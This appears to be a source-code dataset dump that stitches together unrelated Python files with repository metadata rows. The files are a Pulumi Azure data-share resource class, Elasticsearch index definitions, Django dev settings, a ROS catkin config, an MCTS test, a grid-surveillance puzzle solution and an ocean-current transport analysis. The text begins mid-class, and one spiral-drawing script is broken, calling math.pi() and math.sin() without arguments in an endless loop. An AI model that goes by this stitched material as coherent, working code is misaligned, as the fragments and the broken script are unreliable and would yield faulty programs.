def kind(self) -> pulumi.Input[Union[str, 'DataSetMappingKind']]:
"""
Kind of data set mapping.
"""
return pulumi.get(self, "kind")
@kind.setter
def kind(self, value: pulumi.Input[Union[str, 'DataSetMappingKind']]):
pulumi.set(self, "kind", value)
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> pulumi.Input[str]:
"""
The resource group name.
"""
return pulumi.get(self, "resource_group_name")
@resource_group_name.setter
def resource_group_name(self, value: pulumi.Input[str]):
pulumi.set(self, "resource_group_name", value)
@property
@pulumi.getter(name="shareSubscriptionName")
def share_subscription_name(self) -> pulumi.Input[str]:
"""
The name of the share subscription which will hold the data set sink.
"""
return pulumi.get(self, "share_subscription_name")
@share_subscription_name.setter
def share_subscription_name(self, value: pulumi.Input[str]):
pulumi.set(self, "share_subscription_name", value)
@property
@pulumi.getter(name="dataSetMappingName")
def data_set_mapping_name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the data set mapping to be created.
"""
return pulumi.get(self, "data_set_mapping_name")
@data_set_mapping_name.setter
def data_set_mapping_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "data_set_mapping_name", value)
warnings.warn("""Please use one of the variants: ADLSGen2FileDataSetMapping, ADLSGen2FileSystemDataSetMapping, ADLSGen2FolderDataSetMapping, ADLSGen2StorageAccountDataSetMapping, BlobContainerDataSetMapping, BlobDataSetMapping, BlobFolderDataSetMapping, BlobStorageAccountDataSetMapping, KustoClusterDataSetMapping, KustoDatabaseDataSetMapping, SqlDBTableDataSetMapping, SqlDWTableDataSetMapping, SynapseWorkspaceSqlPoolTableDataSetMapping.""", DeprecationWarning)
class DataSetMapping(pulumi.CustomResource):
warnings.warn("""Please use one of the variants: ADLSGen2FileDataSetMapping, ADLSGen2FileSystemDataSetMapping, ADLSGen2FolderDataSetMapping, ADLSGen2StorageAccountDataSetMapping, BlobContainerDataSetMapping, BlobDataSetMapping, BlobFolderDataSetMapping, BlobStorageAccountDataSetMapping, KustoClusterDataSetMapping, KustoDatabaseDataSetMapping, SqlDBTableDataSetMapping, SqlDWTableDataSetMapping, SynapseWorkspaceSqlPoolTableDataSetMapping.""", DeprecationWarning)
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
account_name: Optional[pulumi.Input[str]] = None,
data_set_mapping_name: Optional[pulumi.Input[str]] = None,
kind: Optional[pulumi.Input[Union[str, 'DataSetMappingKind']]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
share_subscription_name: Optional[pulumi.Input[str]] = None,
__props__=None):
"""
A data set mapping data transfer object.
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] account_name: The name of the share account.
:param pulumi.Input[str] data_set_mapping_name: The name of the data set mapping to be created.
:param pulumi.Input[Union[str, 'DataSetMappingKind']] kind: Kind of data set mapping.
:param pulumi.Input[str] resource_group_name: The resource group name.
:param pulumi.Input[str] share_subscription_name: The name of the share subscription which will hold the data set sink.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: DataSetMappingArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
A data set mapping data transfer object.
:param str resource_name: The name of the resource.
:param DataSetMappingArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(DataSetMappingArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
account_name: Optional[pulumi.Input[str]] = None,
data_set_mapping_name: Optional[pulumi.Input[str]] = None,
kind: Optional[pulumi.Input[Union[str, 'DataSetMappingKind']]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
share_subscription_name: Optional[pulumi.Input[str]] = None,
__props__=None):
pulumi.log.warn("""DataSetMapping is deprecated: Please use one of the variants: ADLSGen2FileDataSetMapping, ADLSGen2FileSystemDataSetMapping, ADLSGen2FolderDataSetMapping, ADLSGen2StorageAccountDataSetMapping, BlobContainerDataSetMapping, BlobDataSetMapping, BlobFolderDataSetMapping, BlobStorageAccountDataSetMapping, KustoClusterDataSetMapping, KustoDatabaseDataSetMapping, SqlDBTableDataSetMapping, SqlDWTableDataSetMapping, SynapseWorkspaceSqlPoolTableDataSetMapping.""")
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = DataSetMappingArgs.__new__(DataSetMappingArgs)
if account_name is None and not opts.urn:
raise TypeError("Missing required property 'account_name'")
__props__.__dict__["account_name"] = account_name
__props__.__dict__["data_set_mapping_name"] = data_set_mapping_name
if kind is None and not opts.urn:
raise TypeError("Missing required property 'kind'")
__props__.__dict__["kind"] = kind
if resource_group_name is None and not opts.urn:
raise TypeError("Missing required property 'resource_group_name'")
__props__.__dict__["resource_group_name"] = resource_group_name
if share_subscription_name is None and not opts.urn:
raise TypeError("Missing required property 'share_subscription_name'")
__props__.__dict__["share_subscription_name"] = share_subscription_name
__props__.__dict__["name"] = None
__props__.__dict__["system_data"] = None
__props__.__dict__["type"] = None
alias_opts = pulumi.ResourceOptions(aliases=[pulumi.Alias(type_="azure-nextgen:datashare/v20201001preview:DataSetMapping"), pulumi.Alias(type_="azure-native:datashare:DataSetMapping"), pulumi.Alias(type_="azure-nextgen:datashare:DataSetMapping"), pulumi.Alias(type_="azure-native:datashare/v20181101preview:DataSetMapping"), pulumi.Alias(type_="azure-nextgen:datashare/v20181101preview:DataSetMapping"), pulumi.Alias(type_="azure-native:datashare/v20191101:DataSetMapping"), pulumi.Alias(type_="azure-nextgen:datashare/v20191101:DataSetMapping"), pulumi.Alias(type_="azure-native:datashare/v20200901:DataSetMapping"), pulumi.Alias(type_="azure-nextgen:datashare/v20200901:DataSetMapping")])
opts = pulumi.ResourceOptions.merge(opts, alias_opts)
super(DataSetMapping, __self__).__init__(
'azure-native:datashare/v20201001preview:DataSetMapping',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None) -> 'DataSetMapping':
"""
Get an existing DataSetMapping resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = DataSetMappingArgs.__new__(DataSetMappingArgs)
__props__.__dict__["kind"] = None
__props__.__dict__["name"] = None
__props__.__dict__["system_data"] = None
__props__.__dict__["type"] = None
return DataSetMapping(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter
def kind(self) -> pulumi.Output[str]:
"""
Kind of data set mapping.
"""
return pulumi.get(self, "kind")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
Name of the azure resource
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="systemData")
def system_data(self) -> pulumi.Output['outputs.SystemDataResponse']:
"""
System Data of the Azure resource.
"""
return pulumi.get(self, "system_data")
@property
@pulumi.getter
def type(self) -> pulumi.Output[str]:
"""
Type of the azure resource
"""
return pulumi.get(self, "type")
| [
"[email protected]"
] | |
e79fb1916d742af9ebab6860a5bdb652ce86a1d1 | ede6ee7bdbd76dbb39ffcddfc98725062566ebf4 | /barbados/indexes/list.py | 6c9b98ec709fd610d48643a70555b79387304c46 | [] | no_license | cohoe/barbados | cfa3cb4fab8c183fc4a4f943f452a89ebe193ea2 | 343f8fd4ac1f18e5e93d519cbc064693280e4d00 | refs/heads/master | 2021-08-07T12:33:53.263230 | 2021-07-18T01:59:16 | 2021-07-18T01:59:16 | 234,824,108 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 541 | py | from elasticsearch_dsl import Document, Text, InnerDoc, Object
from barbados.indexes.base import BaseIndex, BarbadosIndex
class ListItemIndex(InnerDoc):
cocktail_slug = Text(analyzer='whitespace', search_analyzer='whitespace')
spec_slug = Text(analyzer='whitespace', search_analyzer='whitespace')
class ListIndex(Document, BarbadosIndex):
id = Text(analyzer='whitespace', search_analyzer='whitespace')
display_name = Text()
items = Object(ListItemIndex, multi=True)
class Index(BaseIndex):
name = 'list'
| [
"[email protected]"
] | |
e1bb0795b99caf9bd0e6effbaf3c0a068848378b | 12b7dc1d608b0deca429485493482afca5f99736 | /app/config/settings/dev.py | 8f40045b1ceefb621445b8de6efa70ce96e82c8e | [] | no_license | Ryanden/EB-Docker-Deploy2-practice- | 3c147786ccb6567c8e325ac79527052a15152a4a | 4e12f4e35da6d26979b6915165227f9167c507d5 | refs/heads/master | 2022-12-09T09:37:51.404751 | 2019-05-16T05:04:15 | 2019-05-16T05:04:15 | 142,002,119 | 0 | 0 | null | 2022-12-08T02:36:17 | 2018-07-23T10:58:30 | Python | UTF-8 | Python | false | false | 369 | py | from .base import *
secrets = json.load(open(os.path.join(SECRETS_DIR, 'dev.json')))
DEBUG = True
INSTALLED_APPS += [
'storages',
'django_extensions'
]
DEFAULT_FILE_STORAGE = 'config.storages.S3DefaultStorage'
AWS_STORAGE_BUCKET_NAME = secrets['AWS_STORAGE_BUCKET_NAME']
WSGI_APPLICATION = 'config.wsgi.dev.application'
DATABASES = secrets['DATABASES']
| [
"[email protected]"
] | |
d20bfefcbb689e95a0e699712752808cee0aabd1 | 5966449d2e29c9b64351895db2932f94f9de42da | /catkin_ws/build/calibration_common/catkin_generated/pkg.develspace.context.pc.py | 74b3622b6da1649f18d3cf518a907cdaf2f04265 | [] | no_license | godaeseong/GoHriProject | 8cbce6934485b8ba3253fc7b6c5b5b59397b4518 | 425e70b7c91b6215f5477fc2250d2b0ac96577be | refs/heads/master | 2021-05-11T22:11:56.099580 | 2018-01-15T02:20:43 | 2018-01-15T02:20:43 | 117,484,817 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 613 | py | # generated from catkin/cmake/template/pkg.context.pc.in
CATKIN_PACKAGE_PREFIX = ""
PROJECT_PKG_CONFIG_INCLUDE_DIRS = "/home/hri/catkin_ws/src/calibration_toolkit/calibration_common/include;/usr/include/eigen3".split(';') if "/home/hri/catkin_ws/src/calibration_toolkit/calibration_common/include;/usr/include/eigen3" != "" else []
PROJECT_CATKIN_DEPENDS = "cmake_modules;image_geometry".replace(';', ' ')
PKG_CONFIG_LIBRARIES_WITH_PREFIX = "".split(';') if "" != "" else []
PROJECT_NAME = "calibration_common"
PROJECT_SPACE_DIR = "/home/hri/catkin_ws/devel/.private/calibration_common"
PROJECT_VERSION = "1.0.0"
| [
"[email protected]"
] | |
6c191364901cf72b6e7ec942af7f4fc7c333ad1a | fc353b0433348ff58841cf32bf1f5e594e037513 | /leetcode/830.py | 8c5023a11d45ce74865a0054c858b8aaa012615c | [] | no_license | TrellixVulnTeam/Demo_933I | ce759ec52dd191f99b998862f4aba7971878ba37 | ab662060eb07a88a48c9832e09bf268517c1a3fa | refs/heads/master | 2023-04-27T16:55:29.627491 | 2021-05-07T05:38:58 | 2021-05-07T05:38:58 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 230 | py | from graphics import *
import math
spriaal = GraphWin("Joonistus", 1000, 1000)
a = 5
b = 4
while True:
x = math.sin(a + math.pi() / 2)
y = math.sin()
pt = Point(x + 500, y + 500)
pt.draw(spriaal)
| [
"[email protected]"
] | |
0474c7ac7fcab24e97fcd8a5d1fc67dd45461b2f | 3a476e0de377d1580facbfd78efdfbca009ed7a3 | /uct_test.py | 403c551b8a4100fa685aca7eda34a6d39cf067a1 | [
"MIT"
] | permissive | liuruoze/Thought-SC2 | b7366186dbb4494fabdb3e0104354665e21ff707 | b3cfbeffbfa09b952c596805d2006af24613db2d | refs/heads/master | 2023-04-28T11:47:56.771797 | 2021-01-15T00:25:26 | 2021-01-15T00:25:26 | 296,185,180 | 4 | 2 | MIT | 2023-04-24T09:06:48 | 2020-09-17T01:17:04 | Python | UTF-8 | Python | false | false | 1,300 | py | USED_DEVICES = "6,7"
import os
os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID"
os.environ["CUDA_VISIBLE_DEVICES"] = USED_DEVICES
from uct.numpy_impl import *
import tensorflow as tf
from prototype.dynamic_network import DynamicNetwork
from prototype.hier_network import HierNetwork
def test(is_restore_policy=True, is_restore_dynamic=True):
# train model
config = tf.ConfigProto(
allow_soft_placement=True, log_device_placement=False,
)
config.gpu_options.allow_growth = True
sess = tf.Session(config=config)
hier_net = HierNetwork(sess, policy_path='./model/20181217-154646/probe')
hier_net.initialize()
if is_restore_policy:
hier_net.restore_policy()
policy_net = PolicyNetinMCTS(hier_net)
dynamic_model_path = './model/20181223-174748_dynamic/probe'
if is_restore_dynamic:
hier_net.restore_dynamic(dynamic_model_path)
dynamic_net = hier_net.dynamic_net
num_reads = 100
import time
tick = time.time()
print(UCT_search(GameState(dynamic_net), num_reads, policy_net))
tock = time.time()
print("Took %s sec to run %s times" % (tock - tick, num_reads))
#import resource
#print("Consumed %sB memory" % resource.getrusage(resource.RUSAGE_SELF).ru_maxrss)
if __name__ == "__main__":
test()
| [
"[email protected]"
] | |
1f3f19f03def5c7a6c1e1e2eb72b4fa33bdf7c50 | 6b5572557c4a0785c4b727ee024790ec066ad6f2 | /Baekjoon/삼성 SW 역량 테스트 기출 문제/감시.py | 17577c83e70a00bb1a4e4811333b625744615101 | [] | no_license | easternpillar/AlgorithmTraining | 5be38998dc062d1d02933f61eaca3265e1b73981 | c8f05eda86161a7dbacab99154be1af292e7db8a | refs/heads/master | 2023-04-29T11:13:34.984005 | 2023-04-08T07:12:29 | 2023-04-08T07:12:29 | 231,875,419 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,986 | py | # Problem:
# Given the structure of office, return the minimum number of blind spots.
# My Solution:
from collections import deque
import copy
def camera1(o, pos):
re = []
temp = copy.deepcopy(o)
r, c = pos[0], pos[1]
while r > 0:
r -= 1
if temp[r][c] == 6:
break
if temp[r][c] == 0:
temp[r][c] = '#'
else:
continue
re.append(temp)
temp = copy.deepcopy(o)
r, c = pos[0], pos[1]
while r < len(temp) - 1:
r += 1
if temp[r][c] == 6:
break
if temp[r][c] == 0:
temp[r][c] = '#'
else:
continue
re.append(temp)
temp = copy.deepcopy(o)
r, c = pos[0], pos[1]
while c > 0:
c -= 1
if temp[r][c] == 6:
break
if temp[r][c] == 0:
temp[r][c] = '#'
else:
continue
re.append(temp)
temp = copy.deepcopy(o)
r, c = pos[0], pos[1]
while c < len(temp[0]) - 1:
c += 1
if temp[r][c] == 6:
break
if temp[r][c] == 0:
temp[r][c] = '#'
else:
continue
re.append(temp)
return re
def camera2(o, pos):
temp = copy.deepcopy(o)
re = []
r, c = pos[0], pos[1]
while r > 0:
r -= 1
if temp[r][c] == 6:
break
if temp[r][c] == 0:
temp[r][c] = '#'
else:
continue
r, c = pos[0], pos[1]
while r < len(temp) - 1:
r += 1
if temp[r][c] == 6:
break
if temp[r][c] == 0:
temp[r][c] = '#'
else:
continue
re.append(temp)
temp = copy.deepcopy(o)
r, c = pos[0], pos[1]
while c > 0:
c -= 1
if temp[r][c] == 6:
break
if temp[r][c] == 0:
temp[r][c] = '#'
else:
continue
r, c = pos[0], pos[1]
while c < len(temp[0]) - 1:
c += 1
if temp[r][c] == 6:
break
if temp[r][c] == 0:
temp[r][c] = '#'
else:
continue
re.append(temp)
return re
def camera3(o, pos):
re = []
temp = copy.deepcopy(o)
r, c = pos[0], pos[1]
while r > 0:
r -= 1
if temp[r][c] == 6:
break
if temp[r][c] == 0:
temp[r][c] = '#'
else:
continue
r, c = pos[0], pos[1]
while c < len(temp[0]) - 1:
c += 1
if temp[r][c] == 6:
break
if temp[r][c] == 0:
temp[r][c] = '#'
else:
continue
re.append(temp)
temp = copy.deepcopy(o)
r, c = pos[0], pos[1]
while r < len(temp) - 1:
r += 1
if temp[r][c] == 6:
break
if temp[r][c] == 0:
temp[r][c] = '#'
else:
continue
r, c = pos[0], pos[1]
while c < len(temp[0]) - 1:
c += 1
if temp[r][c] == 6:
break
if temp[r][c] == 0:
temp[r][c] = '#'
else:
continue
re.append(temp)
temp = copy.deepcopy(o)
r, c = pos[0], pos[1]
while c > 0:
c -= 1
if temp[r][c] == 6:
break
if temp[r][c] == 0:
temp[r][c] = '#'
else:
continue
r, c = pos[0], pos[1]
while r > 0:
r -= 1
if temp[r][c] == 6:
break
if temp[r][c] == 0:
temp[r][c] = '#'
else:
continue
re.append(temp)
temp = copy.deepcopy(o)
r, c = pos[0], pos[1]
while c > 0:
c -= 1
if temp[r][c] == 6:
break
if temp[r][c] == 0:
temp[r][c] = '#'
else:
continue
r, c = pos[0], pos[1]
while r < len(temp) - 1:
r += 1
if temp[r][c] == 6:
break
if temp[r][c] == 0:
temp[r][c] = '#'
else:
continue
re.append(temp)
return re
def camera4(o, pos):
re = []
# 오른쪽, 위, 왼쪽
temp = copy.deepcopy(o)
r, c = pos[0], pos[1]
while r > 0:
r -= 1
if temp[r][c] == 6:
break
if temp[r][c] == 0:
temp[r][c] = '#'
else:
continue
r, c = pos[0], pos[1]
while c > 0:
c -= 1
if temp[r][c] == 6:
break
if temp[r][c] == 0:
temp[r][c] = '#'
else:
continue
r, c = pos[0], pos[1]
while c < len(temp[0]) - 1:
c += 1
if temp[r][c] == 6:
break
if temp[r][c] == 0:
temp[r][c] = '#'
else:
continue
re.append(temp)
# 오른쪽, 아래, 왼쪽
temp = copy.deepcopy(o)
r, c = pos[0], pos[1]
while r < len(temp) - 1:
r += 1
if temp[r][c] == 6:
break
if temp[r][c] == 0:
temp[r][c] = '#'
else:
continue
r, c = pos[0], pos[1]
while c > 0:
c -= 1
if temp[r][c] == 6:
break
if temp[r][c] == 0:
temp[r][c] = '#'
else:
continue
r, c = pos[0], pos[1]
while c < len(temp[0]) - 1:
c += 1
if temp[r][c] == 6:
break
if temp[r][c] == 0:
temp[r][c] = '#'
else:
continue
re.append(temp)
# 왼쪽, 위, 아래
temp = copy.deepcopy(o)
r, c = pos[0], pos[1]
while c > 0:
c -= 1
if temp[r][c] == 6:
break
if temp[r][c] == 0:
temp[r][c] = '#'
else:
continue
r, c = pos[0], pos[1]
while r < len(temp) - 1:
r += 1
if temp[r][c] == 6:
break
if temp[r][c] == 0:
temp[r][c] = '#'
else:
continue
r, c = pos[0], pos[1]
while r > 0:
r -= 1
if temp[r][c] == 6:
break
if temp[r][c] == 0:
temp[r][c] = '#'
else:
continue
re.append(temp)
# 오른쪽, 위, 아래
temp = copy.deepcopy(o)
r, c = pos[0], pos[1]
while c < len(temp[0]) - 1:
c += 1
if temp[r][c] == 6:
break
if temp[r][c] == 0:
temp[r][c] = '#'
else:
continue
r, c = pos[0], pos[1]
while r > 0:
r -= 1
if temp[r][c] == 6:
break
if temp[r][c] == 0:
temp[r][c] = '#'
else:
continue
r, c = pos[0], pos[1]
while r < len(temp) - 1:
r += 1
if temp[r][c] == 6:
break
if temp[r][c] == 0:
temp[r][c] = '#'
else:
continue
re.append(temp)
return re
def camera5(o, pos):
temp = copy.deepcopy(o)
r, c = pos[0], pos[1]
while r > 0:
r -= 1
if temp[r][c] == 6:
break
if temp[r][c] == 0:
temp[r][c] = '#'
else:
continue
r, c = pos[0], pos[1]
while c > 0:
c -= 1
if temp[r][c] == 6:
break
if temp[r][c] == 0:
temp[r][c] = '#'
else:
continue
r, c = pos[0], pos[1]
while c < len(temp[0]) - 1:
c += 1
if temp[r][c] == 6:
break
if temp[r][c] == 0:
temp[r][c] = '#'
else:
continue
r, c = pos[0], pos[1]
while r < len(temp) - 1:
r += 1
if temp[r][c] == 6:
break
if temp[r][c] == 0:
temp[r][c] = '#'
else:
continue
return temp
r, c = map(int, input().split())
office = [list(map(int, list(input().split()))) for _ in range(r)]
origin=0
for i in range(len(office)):
for j in range(len(office[i])):
if office[i][j]==0:
origin+=1
offices = deque([office])
cam = deque()
for i in range(r):
for j in range(c):
if 1 <= office[i][j] <= 5:
cam.append([i, j])
answer=set()
while cam:
c = cam.popleft()
x, y = c[0], c[1]
new_office = []
while offices:
o = offices.popleft()
if o[x][y] == 1:
new_office.extend(camera1(o, [x, y]))
elif o[x][y] == 2:
new_office.extend(camera2(o, [x, y]))
elif o[x][y] == 3:
new_office.extend(camera3(o, [x, y]))
elif o[x][y] == 4:
new_office.extend(camera4(o, [x, y]))
else:
new_office.append(camera5(o, [x, y]))
offices.extend(new_office)
if not cam:
while offices:
temp=offices.popleft()
cnt=0
for i in range(len(temp)):
for j in range(len(temp[i])):
if temp[i][j]==0:
cnt+=1
answer.add(cnt)
break
if answer:
print(min(answer))
else:
print(origin) | [
"[email protected]"
] | |
4677fbdc2a00050d77fd0d794bb57194c2f5ee75 | e8e4bb89c6ce57c038de445091ddebc1c1b6eb26 | /oldscripts/Transport_permoor_newer.py | 7b4c40d98f9b1bbd636b05bd970899b248439250 | [] | no_license | ilebras/OSNAP | dc7fba846f866ec64edab35a278d2ce6c86e5f97 | a5b22026351d2eb8dc4c89e2949be97122936d23 | refs/heads/master | 2021-05-12T16:46:18.955345 | 2020-09-08T23:04:23 | 2020-09-08T23:04:23 | 117,025,921 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 13,958 | py | #################################################################################
#################################################################################
#################################################################################
######################## CALCULATE TRANSPORT ###################################
#################################################################################
#################################################################################
#################################################################################
from aux_funcs import *
daily=pickle.load(open('../pickles/CF_xarray_notid.pickle','rb'))
#################################################################################
# Have a quick look at CF1 evolution in time
#################################################################################
def plotmoortime(moornum):
figure(figsize=(12,3))
ax=contourf(daily.date.data,daily.depth,daily['across track velocity'][moornum-1,:,:],cmap=cm.RdBu_r,vmin=-1.25,vmax=1.25)
colorbar(ticks=[-1.5,-1,-0.5,0,0.5])
contour(daily.date.data,daily.depth,daily['across track velocity'][moornum-1,:,:],[-0.75],colors='k')
ylim([170,0])
ylabel('depth (m)')
xlabel('date')
title('CF'+str(moornum)+' across track velocity')
savefig('../figures/hovmueller/cf'+str(moornum)+'_vel.png',bbox_inches='tight')
savefig('../figures/hovmueller/cf'+str(moornum)+'_vel.pdf',bbox_inches='tight')
def plotmoortime(moornum):
figure(figsize=(12,3))
ax=contourf(daily.date.data,daily.depth,daily['across track velocity'][moornum-1,:,:],cmap=cm.RdBu_r,vmin=-1.25,vmax=1.25)
colorbar(ticks=[-1.5,-1,-0.5,0,0.5])
contour(daily.date.data,daily.depth,daily['across track velocity'][moornum-1,:,:],[-0.75],colors='k')
ylim([170,0])
ylabel('depth (m)')
xlabel('date')
title('CF'+str(moornum)+' across track velocity')
savefig('../figures/hovmueller/cf'+str(moornum)+'_vel.png',bbox_inches='tight')
savefig('../figures/hovmueller/cf'+str(moornum)+'_vel.pdf',bbox_inches='tight')
['salinity',linspace(32.5,35.5,31),cm.YlGnBu_r,arange(32,35.5,0.4),'']
for rr in range(1,9):
plotmoortime(rr)
#################################################################################
#################################################################################
############# Get EGCC and EGC transports ####################################
#################################################################################
#################################################################################
#################################################################################
# Quick code for looking at monthly averages
#################################################################################
def monthplot(afield):
figure()
afield.resample('M',dim='date',how='mean')[:12,:,:].plot(x='distance', y='depth', col='date', col_wrap=4)
monthplot(daily['across track velocity'])
ylim([1000,0])
#################################################################################
################ Find and examine isohalines ###################################
#################################################################################
#
# def find_isohaline(which):
#
# maxdepth=pd.DataFrame(index=daily.date, columns=daily.distance)
#
# for j, m in enumerate(daily.distance):
# for i, d in enumerate(daily.date):
# thissal=daily.salinity[j,:,i]
# nanind=~isnan(thissal)
# if sum(nanind)==0:
# maxdepth.iloc[i,j]=nan
# elif sum((thissal[nanind]>which))==0:
# maxdepth.iloc[i,j]=max(daily.depth[nanind])
# else:
# maxdepth.iloc[i,j]=float(daily.depth[nanind][(thissal[nanind]>which)].min())
#
# maxdepth=maxdepth.astype('float')
# return maxdepth
#
#
# max34depth=find_isohaline(34)
# max348depth=find_isohaline(34.8)
#
# colors=pal.cubehelix.perceptual_rainbow_16.get_mpl_colormap()
#
# fig, ax = plt.subplots(1)
# fig.set_size_inches(12,4)
# max34depth.plot(ax=ax, cmap=colors, alpha=0.5,label=False)
# g=max34depth.resample('M',closed='right').mean().plot(ax=ax, cmap=colors, alpha=1, lw=2)
# legend(loc=(1.05,0))
# gca().invert_yaxis()
# title('Depth of 34 isohaline along CF array')
# savefig('../figures/isohalines/34tseries.png')
#
# fig, ax = plt.subplots(1)
# fig.set_size_inches(12,4)
# max348depth.plot(ax=ax, cmap=colors, alpha=0.5,label=False)
# num=max348depth.resample('M').mean().plot(ax=ax, cmap=colors, alpha=1, lw=2)
# num.legend(loc=(1.05,0))
# gca().invert_yaxis()
# title('Depth of 34.8 isohaline along CF array')
# savefig('../figures/isohalines/348tseries.png')
#
# fig, ax = plt.subplots(1)
# fig.set_size_inches(12,4)
# num=max34depth.resample('M').mean().plot(ax=ax, cmap=colors, alpha=1, lw=2,linestyle='--')
# max348depth.resample('M').mean().plot(ax=ax, cmap=colors, alpha=1, lw=2)
# num.legend(loc=(1.05,0))
# title('Depths of 34 and 34.8 isohalines along CF array')
# gca().invert_yaxis()
# savefig('../figures/isohalines/34and348tseries.png')
#################################################################################
### Look at velocity magnitudes at different moorings
#################################################################################
figure(figsize=(14,3))
for rr in range(3):
plot(daily.date,daily['across track velocity'].min(dim='depth')[rr],alpha=0.5,label='CF'+str(rr+1))
plot(daily.resample('M',dim='date',how='mean').date,daily['across track velocity'].resample('M',dim='date',how='mean').min(dim='depth')[rr])
legend(loc=(1.05,0))
plot(daily.date,0.15*daily['across track velocity'].min(dim='depth')[0],'k')
savefig('../figures/minvels/CF1-2.png')
figure(figsize=(14,3))
for rr in range(1,3):
plot(daily.date,daily['across track velocity'].min(dim='depth')[rr],alpha=0.75,label='CF'+str(rr+1))
# plot(daily.resample('M',dim='date',how='mean').date,daily['across track velocity'].resample('M',dim='date',how='mean').min(dim='depth')[rr])
legend(loc=(1.05,0.2))
title('CF2 and 3 track each other closely')
savefig('../figures/minvels/CF2-3.png')
for rr in range(8):
figure(figsize=(14,3))
# plot(daily.date,daily['across track velocity'].min(dim='depth')[rr],alpha=0.5,label='CF'+str(rr+1))
plot(daily.resample('M',dim='date',how='mean').date,daily['across track velocity'].resample('M',dim='date',how='mean').min(dim='depth')[rr],label='min vel')
title('CF'+str(rr+1))
plot(daily.resample('M',dim='date',how='mean').date,daily['across track velocity'].resample('M',dim='date',how='mean')[rr,0,:],label='surface vel')
legend(loc=(1.05,0.2))
ylabel('velocity (m/s)')
savefig('../figures/velstats/CF'+str(rr+1)+'_minvelcomp_monthly.png',bbox_inches='tight')
for rr in range(8):
figure(figsize=(14,3))
plot(daily.date,daily['across track velocity'].min(dim='depth')[rr],label='min vel')
axhline(0)
title('CF'+str(rr+1))
plot(daily.date,daily['across track velocity'][rr,0,:],label='surface vel')
legend(loc=(1.05,0.2))
ylabel('velocity (m/s)')
savefig('../figures/velstats/CF'+str(rr+1)+'_minvelcomp_daily.png',bbox_inches='tight')
daily.dims
figure(figsize=(14,3))
for rr in range(8):
plot(daily.resample('M',dim='date',how='mean').date,daily['across track velocity'].resample('M',dim='date',how='mean')[rr,0,:],label='CF'+str(rr+1))
legend(loc=(1.05,0.2))
savefig('../figures/velstats/Monthlyave_surf_all.png')
#################################################################################
# Transport -- define as solely at CF1 for now
#################################################################################
mid_dist=hstack((12,(diff(daily.distance)[:-1]+diff(daily.distance)[1:])/2,17))
middistmat=transpose((tile(mid_dist,[len(daily.depth)-1,len(daily.date),1])),(2,0,1))
depthdiffmat=transpose((tile(diff(daily.depth),[len(daily.distance),len(daily.date),1])),(0,2,1))
shape(middistmat[:,:,:])
cf1vel=daily['across track velocity'][0,:-1,:]
cctrans=(cf1vel*depthdiffmat[0,:,:]*middistmat[0,:,:]/1e3).sum('depth')
cctrans_sal=(daily.where(daily.salinity<34)['across track velocity'][0,:-1,:]*depthdiffmat[0,:,:]*middistmat[0,:,:]/1e3).sum('depth')
cctrans.plot(figsize=(12,3),label='Full CF1 water column')
axhline(0)
cctrans.resample('M',how='mean',dim='date').plot(linewidth=2,label='',)
cctrans_sal.plot(label='Fresher than 34 at CF1')
legend()
ylabel('Transport (Sv)')
title('Transport at CF1 (EGCC)')
savefig('../figures/trans/CF1trans.png')
cctrans_scaled=cctrans*3
cctrans.plot(figsize=(12,3),label='')
axhline(0)
cctrans.resample('M',how='mean',dim='date').plot(linewidth=2,label='',)
# cctrans_sal.plot(label='Fresher than 34 at CF1')
legend()
ylabel('[Sv]')
title('EG Coastal Current transport')
savefig('../figures/trans/EGCC_trans.pdf')
cctrans.resample('W',how='mean',dim='date').plot(figsize=(12,3))
EGtottrans=(daily['across track velocity'][1:,:-1,:]*depthdiffmat[1:,:,:]*middistmat[1:,:,:]/1e3).sum('distance').sum('depth')
EGtottrans_vel=(daily.where(daily['across track velocity']<0)['across track velocity'][1:,:-1,:]*depthdiffmat[1:,:,:]*middistmat[1:,:,:]/1e3).sum('distance').sum('depth')
EGtottrans.plot(figsize=(12,3),label='Full water columns')
# axhline(0)
EGtottrans.resample('M',how='mean',dim='date').plot(linewidth=2,label='',)
EGtottrans_vel.plot(label='Only negative velocities')
ylabel('Transport (Sv)')
legend()
title('Transport at CF2-M1 (EGC system)')
savefig('../figures/trans/CF2-8trans.png')
